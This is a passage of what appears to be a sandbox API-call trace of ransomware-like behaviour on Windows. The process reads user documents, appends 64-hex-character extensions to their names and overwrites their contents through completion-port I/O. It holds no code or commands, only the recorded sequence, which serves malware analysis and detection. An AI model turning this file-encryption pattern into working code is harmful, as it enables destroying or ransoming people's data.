lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx.B0986AC744A548A5E983291801FE83A46476ED8B6A52D9F1388CAAE1FFCBE642") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx.B0986AC744A548A5E983291801FE83A46476ED8B6A52D9F1388CAAE1FFCBE642" [0166.884] GetProcessHeap () returned 0x270000 [0166.884] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741d688 [0166.885] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x741d688, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0166.887] CloseHandle (hObject=0x5ac) returned 1 [0166.889] GetProcessHeap () returned 0x270000 [0166.890] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.890] RtlInterlockedCompareExchange64 () returned 0x1 [0166.890] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.896] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.896] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.898] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.900] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx", lpString2=".17186F2B95A55ACB28CBB4F3C66D94649F5D9DCA04D3112C126528020D0C617D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx.17186F2B95A55ACB28CBB4F3C66D94649F5D9DCA04D3112C126528020D0C617D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx.17186F2B95A55ACB28CBB4F3C66D94649F5D9DCA04D3112C126528020D0C617D" [0166.900] GetProcessHeap () returned 0x270000 [0166.900] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f8e48 [0166.900] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f8e48, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.903] CloseHandle (hObject=0x5ac) returned 1 [0166.904] GetProcessHeap () returned 0x270000 [0166.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.905] RtlInterlockedCompareExchange64 () returned 0x1 [0166.905] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.910] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.910] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.912] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.913] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx", lpString2=".91225E8ECE3295BEC1FFB3D1B7D293453C815BA879D3B04290D5A3A3436C8E77" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx.91225E8ECE3295BEC1FFB3D1B7D293453C815BA879D3B04290D5A3A3436C8E77") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx.91225E8ECE3295BEC1FFB3D1B7D293453C815BA879D3B04290D5A3A3436C8E77" [0166.913] GetProcessHeap () returned 0x270000 [0166.914] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f8f70 [0166.914] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f8f70, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0166.916] CloseHandle (hObject=0x5ac) returned 1 [0166.923] GetProcessHeap () returned 0x270000 [0166.924] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.924] RtlInterlockedCompareExchange64 () returned 0x1 [0166.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.929] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.940] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.942] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.943] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx", lpString2=".72DD56B21B1D6869E49A0A774E11F9F9F92978A0CACFBF5B00CF4B1D18C1A771" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx.72DD56B21B1D6869E49A0A774E11F9F9F92978A0CACFBF5B00CF4B1D18C1A771") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx.72DD56B21B1D6869E49A0A774E11F9F9F92978A0CACFBF5B00CF4B1D18C1A771" [0166.943] GetProcessHeap () returned 0x270000 [0166.943] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f9098 [0166.943] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f9098, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.945] CloseHandle (hObject=0x5ac) returned 1 [0166.946] GetProcessHeap () returned 0x270000 [0166.947] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.948] RtlInterlockedCompareExchange64 () returned 0x1 [0166.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.953] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.953] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.955] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.957] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc", lpString2=".6E461DC463F045B418529AA4F0A2AC98B7E3D39B0881F8A8C03FE7A4EBA1FD08" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc.6E461DC463F045B418529AA4F0A2AC98B7E3D39B0881F8A8C03FE7A4EBA1FD08") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc.6E461DC463F045B418529AA4F0A2AC98B7E3D39B0881F8A8C03FE7A4EBA1FD08" [0166.957] GetProcessHeap () returned 0x270000 [0166.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741d7c0 [0166.957] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741d7c0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.959] CloseHandle (hObject=0x598) returned 1 [0166.960] GetProcessHeap () returned 0x270000 [0166.961] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.961] RtlInterlockedCompareExchange64 () returned 0x1 [0166.961] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.966] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.966] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.969] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.970] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx", lpString2=".3BA170F0FEED52985A04A9B09FA46296B1757683F1C12DEDBBAA6CA7D4473C06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx.3BA170F0FEED52985A04A9B09FA46296B1757683F1C12DEDBBAA6CA7D4473C06") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx.3BA170F0FEED52985A04A9B09FA46296B1757683F1C12DEDBBAA6CA7D4473C06" [0166.970] GetProcessHeap () returned 0x270000 [0166.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4263300 [0166.970] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x4263300, Length=0x132, FileInformationClass=0xa) returned 0x0 [0166.972] CloseHandle (hObject=0x598) returned 1 [0166.973] GetProcessHeap () returned 0x270000 [0166.974] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.974] RtlInterlockedCompareExchange64 () returned 0x1 [0166.974] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.979] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.979] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.981] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.982] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc", lpString2=".E5427B1DA88344CA26B393462767E1829EA472AD39D3F8E617E7008138354B24" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc.E5427B1DA88344CA26B393462767E1829EA472AD39D3F8E617E7008138354B24") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc.E5427B1DA88344CA26B393462767E1829EA472AD39D3F8E617E7008138354B24" [0166.982] GetProcessHeap () returned 0x270000 [0166.982] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x741d8f8 [0166.982] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741d8f8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0166.984] CloseHandle (hObject=0x598) returned 1 [0166.985] GetProcessHeap () returned 0x270000 [0166.987] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.987] RtlInterlockedCompareExchange64 () returned 0x1 [0166.987] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.991] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.992] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.994] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.996] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv", lpString2=".519DC6C08F95059FFE29761AD1651C20C09EB8B0B46EFD5DFDF0098255A0492C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv.519DC6C08F95059FFE29761AD1651C20C09EB8B0B46EFD5DFDF0098255A0492C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv.519DC6C08F95059FFE29761AD1651C20C09EB8B0B46EFD5DFDF0098255A0492C" [0166.996] GetProcessHeap () returned 0x270000 [0166.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741da30 [0166.996] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741da30, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.999] CloseHandle (hObject=0x598) returned 1 [0167.001] GetProcessHeap () returned 0x270000 [0167.002] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.002] RtlInterlockedCompareExchange64 () returned 0x1 [0167.002] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.008] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.008] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.010] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0167.012] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt", lpString2=".0F5430AD717254951B6E2084D87536F44F26DB96513F3D5D14B4A2DAE7778A5E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt.0F5430AD717254951B6E2084D87536F44F26DB96513F3D5D14B4A2DAE7778A5E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\sIJyL8HKTPr6.ppt.0F5430AD717254951B6E2084D87536F44F26DB96513F3D5D14B4A2DAE7778A5E" [0167.012] GetProcessHeap () returned 0x270000 [0167.012] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741db68 [0167.012] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741db68, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0167.014] CloseHandle (hObject=0x598) returned 1 [0167.015] GetProcessHeap () returned 0x270000 [0167.016] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.016] RtlInterlockedCompareExchange64 () returned 0x1 [0167.016] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.020] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x6e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.021] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.023] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0167.024] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc", lpString2=".FBDCD0F0AAFC33D6DD54FE867D52C30E5A378CAC1E9C88FC399A9F3AC8165973" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc.FBDCD0F0AAFC33D6DD54FE867D52C30E5A378CAC1E9C88FC399A9F3AC8165973") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\vrGluN.doc.FBDCD0F0AAFC33D6DD54FE867D52C30E5A378CAC1E9C88FC399A9F3AC8165973" [0167.024] GetProcessHeap () returned 0x270000 [0167.024] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f91c0 [0167.024] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42f91c0, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0167.026] CloseHandle (hObject=0x598) returned 1 [0167.027] GetProcessHeap () returned 0x270000 [0167.028] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0167.028] RtlInterlockedCompareExchange64 () returned 0x1 [0167.028] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.040] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.041] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.044] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0167.045] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx", lpString2=".794936C49BAC08DD8AC88ECC146627EAEAB4B6371F824CACF754C357A6EDAF38" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx.794936C49BAC08DD8AC88ECC146627EAEAB4B6371F824CACF754C357A6EDAF38") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\ohf p64bSEpu.pptx.794936C49BAC08DD8AC88ECC146627EAEAB4B6371F824CACF754C357A6EDAF38" [0167.045] GetProcessHeap () returned 0x270000 [0167.045] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x42f92e8 [0167.045] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f92e8, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0167.047] CloseHandle (hObject=0x5ac) returned 1 [0167.048] GetProcessHeap () returned 0x270000 [0167.050] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.050] RtlInterlockedCompareExchange64 () returned 0x1 [0167.050] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.178] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0167.179] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.181] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0167.183] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx", lpString2=".9F222FB3EED14958C3DDC9C3298A30DA85E70C9F6F68D4F517B28C2AD0C09967" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx.9F222FB3EED14958C3DDC9C3298A30DA85E70C9F6F68D4F517B28C2AD0C09967") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\otlV MF8xoszJZMG1k_q.docx.9F222FB3EED14958C3DDC9C3298A30DA85E70C9F6F68D4F517B28C2AD0C09967" [0167.183] GetProcessHeap () returned 0x270000 [0167.183] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741dca0 [0167.183] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x741dca0, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0167.192] CloseHandle (hObject=0x5ac) returned 1 [0167.192] GetProcessHeap () returned 0x270000 [0167.194] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0167.195] RtlInterlockedCompareExchange64 () returned 0x1 [0167.195] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.200] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0167.201] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0167.202] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0167.204] RtlInterlockedCompareExchange64 () returned 